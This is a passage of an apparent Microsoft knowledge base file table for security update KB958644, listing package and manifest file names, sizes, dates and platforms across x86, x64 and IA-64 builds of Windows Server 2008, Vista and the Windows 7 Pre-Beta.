Date

Time

Platform

Netutils.dll

6.1.6801.4107

59,904

20-Oct-2008

23:08

IA-64

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86

Additional file information for Windows Server 2008, for Windows Vista, and for Windows 7 Pre-Beta

Additional files for all supported x86-based versions of Windows Server 2008, Windows Vista

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,743

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,445

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,906

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,612

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,450

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,744

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,447

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,435

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,357

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,376

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,691

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,722

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,411

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,431

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,413

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,432

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,415

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,421

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,440

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,412

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,431

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,420

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,410

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,429

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,414

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,433

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,493

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_36258762845e107951bd9aa6bb6e2cf2_31bf3856ad364e35_6.0.6000.20937_none_1b3e8fbe3df577d5.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_839cbb983f595ac76fde121c813c640b_31bf3856ad364e35_6.0.6000.16764_none_c31a32b5eaec82f7.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_8beec6c9c4e53ad3ad4e2eefee83c7bb_31bf3856ad364e35_6.0.6001.22288_none_24746e8695e50ab0.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_cf5fc08aa887a883eefd054adf032c14_31bf3856ad364e35_6.0.6001.18157_none_f5617edb87321701.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:29

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

04:57

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable


Additional files for all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista

File name

Amd64_016ff16d0fb7adfd32cc8cac619f7020_31bf3856ad364e35_6.0.6001.22288_none_63879e5572c63a8d.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_17b51416d1f0879bd01802235d17e183_31bf3856ad364e35_6.0.6001.18157_none_059d2147a43b46c0.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_4a708e10febe190d564ab30203394f1c_31bf3856ad364e35_6.0.6000.16764_none_7838dfe143478799.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_67941fc4deac88f98600b6aa3d634fa5_31bf3856ad364e35_6.0.6001.18157_none_7700084c05e335ee.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_73aa7275aac93043dad7f68b22dc689e_31bf3856ad364e35_6.0.6000.20937_none_8d173e2dc1c0db98.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_854c9ca1f90fdf0fef990f5d99c75b11_31bf3856ad364e35_6.0.6001.22288_none_48ff81aaf19bff94.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_c889ea7b0835e36fc67c4ccc4ec07ed3_31bf3856ad364e35_6.0.6000.16764_none_c5bae36e7a056bed.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_f9502c7e5f482bc6c92ce8f63becff94_31bf3856ad364e35_6.0.6000.20937_none_c14b7e8f3e6dce2d.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_e72f9b76bcf3c8a0.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:21

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_e7dcaac9d5f65dc3.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:01

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_e923aae6ba0f89a5.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

06:39

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_e98dd837d3449699.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:38

Platform

Not Applicable

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,753

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,459

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,126

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

3,056

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,892

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,894

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,894

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,754

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,461

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,424

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,443

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,365

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,384

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,701

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,732

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,419

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,421

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,440

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,423

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,442

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,429

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,448

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,420

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,428

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,447

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,418

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,437

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,422

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,441

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,519

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:29

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

04:57

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable


Additional files for all supported IA-64-based versions of Windows Server 2008

File name

Ia64_5318e8eb9e87d0695533f066c047f96b_31bf3856ad364e35_6.0.6001.18157_none_82a29afb7aa0d23c.manifest

File version

Not Applicable

File size

698

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_9c84e32c7f67dae6326ee85998cad9e6_31bf3856ad364e35_6.0.6001.18157_none_9713870461709fdd.manifest

File version

Not Applicable

File size

1,038

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_f1b22e2871aa832be2376a26d588f7f5_31bf3856ad364e35_6.0.6001.22288_none_d0e8a3e531733c64.manifest

File version

Not Applicable

File size

1,038

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_f420bbd70e5d59529cd3c0d55fc47000_31bf3856ad364e35_6.0.6001.22288_none_fa8a6023da16ba48.manifest

File version

Not Applicable

File size

698

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d06b35901b0216b.manifest

File version

Not Applicable

File size

12,048

Date (UTC)

16-Oct-2008

Time (UTC)

08:04

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d70e0aa1ae52e5f.manifest

File version

Not Applicable

File size

12,048

Date (UTC)

16-Oct-2008

Time (UTC)

06:02

Platform

Not Applicable

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,961

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,885

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,961

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,885

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,415

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,436

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,419

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,438

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,424

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,444

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,435

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,423

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,443

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

2,381

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable

Additional file information for Windows 7 Pre-Beta

Additional files for all supported x86-based versions of Windows 7 Pre-Beta

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,817

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,817

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,822

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,822

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,468

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,468

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,456

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,456

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,462

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,462

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,466

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,466

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_5d2c1db358bd7f56.manifest

File version

Not Applicable

File size

694

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_977a59a5a18b9d73.manifest

File version

Not Applicable

File size

694

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable

Additional files for all supported x64-based versions of Windows 7 Pre-Beta

File name

Amd64_6c5ff7f4df12fe656967bcd9a0851cf9_31bf3856ad364e35_6.1.6801.4107_none_9d8d50283e89a478.manifest

File version

Not Applicable

File size

698

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_8bb4665ee38b9909b49c6690c13a54c9_31bf3856ad364e35_6.1.6801.4106_none_abaa496388f1d851.manifest

File version

Not Applicable

File size

1,037

Date (UTC)

18-Oct-2008

Time (UTC)

